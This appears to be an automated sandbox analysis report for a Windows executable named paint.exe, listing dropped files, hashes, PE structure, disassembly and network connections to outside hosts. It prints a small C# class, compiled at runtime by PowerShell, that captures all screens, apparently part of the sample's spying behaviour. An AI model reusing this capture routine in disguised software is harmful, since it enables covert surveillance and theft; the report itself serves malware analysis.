SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s2x2g0v4.emn.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sdkaokjv.rh3.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vm3ed2yz.zem.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xp1zyfch.5yd.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y34ut4tw.bsi.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\u3oq5ojt\CSCF0203E537737442CADEFC214ABE2ED32.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.113268653505346
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryBYak7Ynqq6NPN5Dlq5J:+RI+ycuZhNMakS4PNnqX
MD5:	074D4044A23A228716916C7D35B76AF4
SHA1:	20291E2E4879DAFE4BAC4497DE9BC11278304064
SHA-256:	765B8C9C24A5AD51E433BE9A850904E30560E684B2F6389D24EAB86CC7A19127
SHA-512:	7545E8C7B34CAD77DDD20B2BDD447CDD104E170CB1937E31185FFE72A5D5235818003B43ADDD91BCC17EDE62CBC748AA52260B60A13A07BA58A2FABBD862ABAF
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.3.o.q.5.o.j.t...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...u.3.o.q.5.o.j.t...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1004
Entropy (8bit):	4.154581034278981
Encrypted:	false
SSDEEP:	24:Jo4KMz04F03wykl4qk6oAuBGOUBrRmLW+7UCPa:Jo4hz0BAl4xBQ0XQCC
MD5:	C76055A0388B713A1EABE16130684DC3
SHA1:	EE11E84CF41D8A43340F7102E17660072906C402
SHA-256:	8A3CD008E86A3D835F55F8415F5FD264C6DACDF0B7286E6854EA3F5A363390E7
SHA-512:	22D2804491D90B03BB4B640CB5E2A37D57766C6D82CAF993770DCF2CF97D0F07493C870761F3ECEA15531BD434B780E13AE065A1606681B32A77DBF6906FB4E2
Malicious:	false
Preview:	.using System;..using System.Collections.Generic;..using System.Drawing;..using System.Windows.Forms;....public class Screenshot..{.. public static List<Bitmap> CaptureScreens().. {.. var results = new List<Bitmap>();.. var allScreens = Screen.AllScreens;.... foreach (Screen screen in allScreens).. {.. try.. {.. Rectangle bounds = screen.Bounds;.. using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)).. {.. using (Graphics graphics = Graphics.FromImage(bitmap)).. {.. graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size);.. }.... results.Add((Bitmap)bitmap.Clone());.. }.. }.. catch (Exception).. {.. // Handle any exceptions here.. }.. }.... return results;..

C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
Category:	dropped
Size (bytes):	607
Entropy (8bit):	5.335711261223786
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6KOkuqy776SE71xBkuqTM3RDwA+iM3RLB5wkn2B:p37Lvkmb6KOkqe1xBkrk+ikOfMWZEifp
MD5:	2B6371FE7EEEBCE825C5AC7A8FF21A68
SHA1:	D9DBE7077FB6244CEE706D49CA348746C7F7B6AB
SHA-256:	76886F799173706ECBE74A90513FA00BDCB380E7B107E3FBE45819CCA6AC0084
SHA-512:	85A670935FD765E8D81170B3119E480AC4047E4596F1818EA5C88822CB333A797F4F7679B1697BA1791BC19AEA1E3754EAA3D767BF64D23148C5EF082F4A8A2B
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.0.cs"

C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	3.16199579923142
Encrypted:	false
SSDEEP:	48:6R7oEAtf0KhzBU/Mf6mtJbN0TpW1ulMa3Aq:HNz0jmzObaK
MD5:	28AD2832302A01553149577349AF84EF
SHA1:	4F998ADC3F8632EF89F11EF7460058A97DFA94E5
SHA-256:	C557B59AE316604650E4F60EDCB9EDCBB216186C80113C3D0C1F0215CA57B01C
SHA-512:	AED37635574374FB61D90554BCD25418EB538516C3E43B7F3119C9F742F16865C9B67620FC4F969600F7112B0CA2D38474788FA6FB79CD48073852D27D7814C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....azg...........!.................&... ...@....... ....................................@..................................%..K....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................&......H.......<!...............................................................0..........s.....(...........8...........o.......(......(....s........(..........(......(....s....~......(....o........,...o........o....t....o........,...o.......&.....X.......i?k.......(....B.(j........9.Q...........{.........(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID...........#Blob...........G.........%3............................................

C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.out

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
Category:	modified
Size (bytes):	1149
Entropy (8bit):	5.498949646037168
Encrypted:	false
SSDEEP:	24:KJftkId3ka6KOkqeFkOf9EifsKax5DqBVKVrdFAMBJTH:utkkka6NkqeFky9EusK2DcVKdBJj
MD5:	E9692C7630882402BBE6B295D094835C
SHA1:	B3B2189B192B94A4FBC54991C2D48A4176CCF31D
SHA-256:	08008EDFC86019AF265F64632473169D6590C7C9C61BF469A9D8FC8F2A4E1DEC
SHA-512:	7CF39F8096337AF0A7D4B0F1B051662E6F5B2150D1C9F70590CD4EC61AE07DA25C384979858A09FDAC0595E4B849F3FE4455A0847087CB226DAFD6692AADCB49
Malicious:	false
Preview:	.C:\Users\user\AppData\Local\Temp\..........> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll" /out:"C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\u3oq5ojt\u3oq5ojt.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longe

\Device\ConDrv

Download File

Process:	C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.331807756485642
Encrypted:	false
SSDEEP:	3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
MD5:	195D02DA13D597A52F848A9B28D871F6
SHA1:	D048766A802C61655B9689E953103236EACCB1C7
SHA-256:	ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
SHA-512:	1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
Malicious:	false
Preview:	..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...

\Device\Null

Download File

Process:	C:\Windows\System32\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	311
Entropy (8bit):	4.754235272695453
Encrypted:	false
SSDEEP:	6:Pz9NvmWxHLTSJALTSJALTSrcsWTo6wGv+wAFeMmvVOIHJFxMVlmJHaVFEG1vv:Pr5pTcgTcgTLs4omvtAFSkIrxMVlmJHu
MD5:	3D600CFBE2E341402525741903F3F100
SHA1:	C950CF2FEDF7021B91BC04AA85217CCD51BBCE8C
SHA-256:	5CCE82E0A99A5F0A48086A40B4508A2850A83DD6AF0A2699351B8FB14A783B55
SHA-512:	F8524EB99FEFCF2222C07157735A5106F1F2900B270B47CEAC4A103D9515E9BB477352BA161F54576B68321D657DD569477E1ECA44E53362228330BA0BCF7115
Malicious:	false
Preview:	..Pinging 830021 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.994286468087256
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	paint.exe
File size:	8'809'834 bytes
MD5:	14f0421574fd16a0a6a7ac20fe22482b
SHA1:	64974f8d78d54c43775ab2a67e4341442bfeb01a
SHA256:	ee5707904b7372b5389df014be575f574497907db3cad4ba45d52adc8f12e0a3
SHA512:	4bd79e9c67fc149888ff130c7e41dff166d2c2ba26b1ced48e01f1f8172a18b3c1c8c19643d978c60a1d635c3dc93105ce61931b06f886d6401433dfd8dec899
SSDEEP:	196608:eYd1dh3wfI9jUCnORird1KfbLOYFSEcN2oc+nBIdAx:TddcIHOQ76bE1nnBI
TLSH:	AC963351268148F5EEB35A3FD9625E4286B33C116320EAAF07E4C77ADD335F118397A2
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d..

File Icon


Icon Hash:	306689f0d475355e

Static PE Info

General

Entrypoint:	0x14000ce20
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x677A36D4 [Sun Jan 5 07:37:56 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	72c4e339b7af8ab1ed2eb3821c98713a

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F06310C84FCh
dec eax
add esp, 28h
jmp 00007F06310C811Fh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
sub esp, 28h
call 00007F06310C88C8h
test eax, eax
je 00007F06310C82C3h
dec eax
mov eax, dword ptr [00000030h]
dec eax
mov ecx, dword ptr [eax+08h]
jmp 00007F06310C82A7h
dec eax
cmp ecx, eax
je 00007F06310C82B6h
xor eax, eax
dec eax
cmpxchg dword ptr [0003570Ch], ecx
jne 00007F06310C8290h
xor al, al
dec eax
add esp, 28h
ret
mov al, 01h
jmp 00007F06310C8299h
int3
int3
int3
dec eax
sub esp, 28h
test ecx, ecx
jne 00007F06310C82A9h
mov byte ptr [000356F5h], 00000001h
call 00007F06310C79F5h
call 00007F06310C8CE0h
test al, al
jne 00007F06310C82A6h
xor al, al
jmp 00007F06310C82B6h
call 00007F06310D57FFh
test al, al
jne 00007F06310C82ABh
xor ecx, ecx
call 00007F06310C8CF0h
jmp 00007F06310C828Ch
mov al, 01h
dec eax
add esp, 28h
ret
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
cmp byte ptr [000356BCh], 00000000h
mov ebx, ecx
jne 00007F06310C8309h
cmp ecx, 01h
jnbe 00007F06310C830Ch
call 00007F06310C883Eh
test eax, eax
je 00007F06310C82CAh
test ebx, ebx
jne 00007F06310C82C6h
dec eax
lea ecx, dword ptr [000356A6h]
call 00007F06310D55F2h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3ca34	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x28520	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x44000	0x2238	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x70000	0x764	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3a080	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x39f40	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x4a0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29f70	0x2a000	b8c3814c5fb0b18492ad4ec2ffe0830a	False	0.5518740699404762	data	6.489205819736506	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0x12a28	0x12c00	4e9a93d8e219d154f6bf8129e675b4e8	False	0.5242838541666667	data	5.750775042670287	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x53f8	0xe00	dba0caeecab624a0ccc0d577241601d1	False	0.134765625	data	1.8392217063172436	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x44000	0x2238	0x2400	9cd1eac931545f28ab09329f8bfce843	False	0.4697265625	data	5.2645170849678795	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x28520	0x28600	2a86f00dc3ead57fc3de1eaa3f6fbf08	False	0.9907060274767802	data	7.989838280005199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x70000	0x764	0x800	816c68eeb419ee2c08656c31c06a0fff	False	0.5576171875	data	5.2809528666624175	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x47250	0x363	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced	1.0126874279123415
RT_ICON	0x475b4	0x6e1	PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced	1.0062464508801816
RT_ICON	0x47c98	0xb78	PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced	1.0037465940054495
RT_ICON	0x48810	0x17e2	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	1.001799149492967
RT_ICON	0x49ff4	0x2792	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	1.001085883514314
RT_ICON	0x4c788	0x8118	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	1.0006354393609296
RT_ICON	0x548a0	0x1a383	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	1.0003817682387448
RT_GROUP_ICON	0x6ec24	0x68	data	0.7596153846153846
RT_VERSION	0x6ec8c	0x384	data	0.46
RT_MANIFEST	0x6f010	0x50d	XML 1.0 document, ASCII text	0.4694508894044857

Imports

DLL	Import
USER32.dll	CreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	GetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 5, 2025 10:16:36.015024900 CET	49738	80	192.168.2.4	208.95.112.1
Jan 5, 2025 10:16:36.020633936 CET	80	49738	208.95.112.1	192.168.2.4
Jan 5, 2025 10:16:36.020703077 CET	49738	80	192.168.2.4	208.95.112.1
Jan 5, 2025 10:16:36.020775080 CET	49738	80	192.168.2.4	208.95.112.1
Jan 5, 2025 10:16:36.025535107 CET	80	49738	208.95.112.1	192.168.2.4
Jan 5, 2025 10:16:36.552270889 CET	80	49738	208.95.112.1	192.168.2.4
Jan 5, 2025 10:16:36.607511997 CET	49738	80	192.168.2.4	208.95.112.1
Jan 5, 2025 10:16:36.718888998 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:36.718913078 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:36.718988895 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:36.739370108 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:36.739392042 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.200479984 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.201030016 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.201045990 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.202012062 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.202205896 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.203599930 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.203672886 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.203901052 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.203908920 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.203963041 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.203999996 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206037998 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206077099 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206218004 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206258059 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206490993 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206513882 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206532001 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206559896 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206670046 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206680059 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206691980 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206701994 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206716061 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206722975 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206736088 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206743956 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206753969 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206762075 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206772089 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206778049 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206784010 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206789017 CET	49739	443	192.168.2.4	162.159.137.232
Jan 5, 2025 10:16:37.206794977 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206803083 CET	443	49739	162.159.137.232	192.168.2.4
Jan 5, 2025 10:16:37.206803083 CET	49739	443	192.168.2.4	162.159.137.232
